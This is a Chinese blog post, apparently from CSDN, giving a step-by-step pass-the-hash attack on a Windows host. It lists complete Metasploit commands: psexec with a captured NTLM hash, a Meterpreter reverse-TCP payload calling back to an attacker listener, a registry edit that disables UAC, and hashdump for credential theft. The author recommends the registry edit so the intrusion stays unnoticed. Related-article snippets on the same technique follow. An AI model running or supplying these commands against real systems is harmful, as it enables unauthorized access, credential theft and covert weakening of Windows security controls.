后渗透模块之Hash传递

最新推荐文章于 2024-05-14 04:48:46 发布
最新推荐文章于 2024-05-14 04:48:46 发布
阅读量377 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/113180889
版权

前言

我们有时候获取到了用户的hash值但是不能正确地解出密码,这是因为hash解码是需要碰撞的,成功的几率也不是特别高,因此我们使用另一种方式,直接使用hash值登录目标系统。

利用过程

前提是我们已经获取到了目标系统的SYSTEM权限,然后我们利用smb下的psexec这个模块
在这里插入图片描述

use exploit/windows/smb/psexec
set rhosts 192.168.75.139
set smbuser pyh(普通管理员账户)
set smbpass aad3b435b51404eeaad3b435b51404ee:588feb889288fb953b5f094d47d1565c
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.75.128
set lport 3333
show options
run

在这里插入图片描述

执行攻击之后发现我们的攻击被UAC阻拦了
在这里插入图片描述
这里提供两种关闭UAC的方式,第一种是直接在Windows系统中的控制面板中的用户和账户,管理用户控制设置,然后将其调到最低。
在这里插入图片描述
在这里插入图片描述
但是考虑到你在渗透别人的系统,不可能先通知别人先关闭防火墙,这样我们的行踪就会暴露,因此我提倡使用第二种方式,通过得到的shell改变UAC注册表总的值

进入shell后,执行reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,路径符号一定要写对,那个是UAC在注册表中的位置
在这里插入图片描述
修改成功后使用shutdown -g重启电脑,在这之前,我提倡先使用hashdump模块对普通密码进行猜解

use post/windows/gather/hashdump
set session 4
run

在这里插入图片描述

总结:在我们对目标的hash值不能进行爆破成功的时候,我们可以采用hash传递的方式登入目标系统,这也不失为一种好的渗透思路。

平凡的学者
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
内网渗透-Hash传递攻击
lza20001103的博客
10-01 1584
Hash传递攻击 文章目录Hash传递攻击前言psexec模块 前言 今天给大家讲解一个知识点,Hash传递攻击,它是在不知道明文密码,只知道hash值的时候进行攻击的一种手段,会返回一个会话,且是system权限,但会遇到uac的问题,我们只要关闭uac就可以了。 psexec模块 利用的前提是必须开放445端口 首先,我们需要获得用户的hash值 在kali中,不知道为什么hash值获取不了,我们cs上线来获取hash值 Administrator的hash值如下: aad3b435b51404eea
哈希传递攻击(Pass-the-Hash,PtH)
谢公子的博客
01-11 5200
目录 哈希传递攻击 MSF进行哈希传递攻击PtH(工作组) MSF进行哈希传递攻击PtH(域) mimikatz进行哈希传递攻击PtH(工作组) mimikatz进行哈希传递攻击PtH(域) 使用AES进行哈希传递攻击(PTK,Pass The Key) 更新KB2871997补丁产生的影响 哈希传递攻击 哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们...
渗透测试笔记】之【内网渗透——横向移动:使用mimikatz和CS进行哈希传递攻击】
AA8j的博客
11-15 3415
文章目录1. mimikatz1.1 NTLM Hash传递攻击1.2 AES-256 哈希传递攻击2. CS2.1 获得一个Beacon2.2 dump Hash2.2.1 方法一2.2.2 方法二2.2.3 查看2.3 哈希传递攻击 1. mimikatz 地址:https://github.com/gentilkiwi/mimikatz 1.1 NTLM Hash传递攻击 首先获得域管NTLM Hash:【渗透测试笔记】之【内网渗透——横向移动:获取Windows明文密码与散列值的若干方法和防御手段
哈希传递常用方法_hash传递工具
最新发布
2401_84972814的博客
05-14 424
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
利用hash传递拿到会话
weixin_50683638的博客
04-27 156
运行路由报错 使用模块扫描路由 设置后运行445端口开启了 这里需要换一个端口,以免跟cobalt strike冲突,最后看到445端口开启的ip 利用hashdump传递会话复制Administrator的hash值 将上面的hash值复制到smbpass 这里用的lhost是vps的外网ip ...
内网渗透——哈希传递
来日可期的博客
10-09 1183
哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。
使用哈希传值
独自等待的专栏
03-24 835
public TCHospInfoData GetOnHospBasic(decimal id_Orgid, string is_Frcode, string is_FJCMYear, string is_FCOUNTYMARK, string OutYN, string AllYN, string is_FIMPORTCODE, System.Collections.IDictionary i
内网渗透之哈希传递
agrilly的博客
07-04 313
哈希算法、内网渗透、加密
海量数据解决思路之Hash算法
01-30
本文将粗略讲述一下Hash算法的概念特性,里边会结合分布式系统负载均衡实例对Hash的一致性做深入探讨。另外,探讨一下Hash算法在海量数据处理方案中的通用性。最后,从源代码出发,具体分析一下Hash算法在MapReduce...
Prototype使用指南之hash.js
12-08
Hash对象(关联数组)是Prototype新建的一个对象,要创建一个Hash对象可以调用$H(object)方法,因为javascript本身的特点(对象本身就是关联数组) ,所以实现Hash也很简单,Prototype中的Hash只是javascript的关联数组...
内存Hash算法模块详细设计说明
09-08
内存Hash算法模块详细设计说明内存Hash算法模块详细设计说明
oracle分区表之hash分区表的使用及扩展
09-10
Oracle分区表中的Hash分区是一种基于哈希算法的分区策略,适用于处理无法清晰定义分区范围的大型数据表。这种分区方式通过计算分区键的哈希值来决定数据存储在哪个分区,以此达到数据分散和负载均衡的目的。Hash分区...
多页面-HASH-页面间传值 Sloth-state
weixin_34194087的博客
01-02 112
Sloth-state.js 由于项目使用其他前端框架编写,没有几个页面,只需要一个页面带参数的跳转,所以就写了这个方法;不依赖任何js; 1/ Sloth.state.setConfig 设置各个页面传值和跳转的名字 Sloth.state.setConfig({ //'default' 是路由的名字,用来go方法跳转template是页面路径;连接host的绝对路径 param是传值的规格;用...
内网渗透之获取hash身份凭证
HWHXY的博客
02-25 450
内网渗透之获取hash身份凭证 0 前言 下文主要是从《从0到1的CTFer成长之路》阅读所做的笔记,以备忘总结为目的,归纳角度从原理和方法入手,直观体验是每个标题有两个子标题,分别为原理和方法 上文提到内网渗透之获取明文身份凭证,但有时如果拿不到明文的身份凭证又该怎么办,还有一种hash凭证可以获取。 1 SAM数据库 原理 审核 SAM,它使您能够审核通过尝试访问 SAM 安全帐户管理器或 SAM (生成的) 事件。安全帐户管理器 (SAM) 是运行 Windows 操作系统的计算机上存在的数据库,用于
使用Hash直接登录Windows(HASH传递
weixin_30498921的博客
01-23 466
抓取windows hash值 得到administrator的hash: 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF msf调用payload: use exploit/windows/smb/psexec show options set RHOST 192.168.81.129 set ...
如何使用哈希表传递数据
vb.net 专栏
01-20 1582
定义哈希表,并且参加相应的参数 Dim values As New Hashtable() Dim y As Double Dim x As Double values.Add("x", x) values.Add("y", y) FunctionA(values)  接收哈希表传来的数据,并且使用他的数据   Public Sub FunctionA(ByVa
PtH(hash传递攻击)原理探秘
weixin_30500473的博客
08-10 3584
背景知识 Windows 横向渗透的两种方式 1、hash传递攻击,通过传递NTLM-Hash,登录机器,简称PtH; 2、ticket传递攻击,通过传递kerberos的ticket,登录机器,简称PtT; 以上两种都是常见的域内或者叫做内网渗透的横向移动的常见手段。 NTLM协议机制简述 在hash传递攻击中。传递的就是NTLMhash值,这里我们就要简述一下NTLM的过程。 NT...
hash传递攻击
qq_58000413的博客
06-05 736
Pass the hash也就是Hash传递攻击,简称为PTH。模拟用户登录不需要用户明文密码只需要hash值就可以直接来登录目标系统。开启445端口开启ipc$共享。
WINDOWS下传递管理员账号哈希值***
weixin_33755847的博客
12-10 210
在metasploit中只要有密码的哈希值就可以***操作系统了不需要明文密码,下面以实验为目的先用工具wce在操作系统上提取管理员密码的哈希值。下载wcehttp://1230tt.com/download/wce_v1_4beta_x32.zip在目标服务器上进入目录wce -l获取管理密码哈希值1AA818381E4E281BAAD3B435B51404EE:5F18A...
python_gnupg模块hash
06-12
你是想了解python_gnupg模块如何使用哈希(hash)吗?如果是的话,python_gnupg模块可以使用哈希算法来加密和解密数据。具体来说,你可以使用哈希算法来生成数据的摘要,然后使用GPG密钥对该摘要进行签名。这样可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值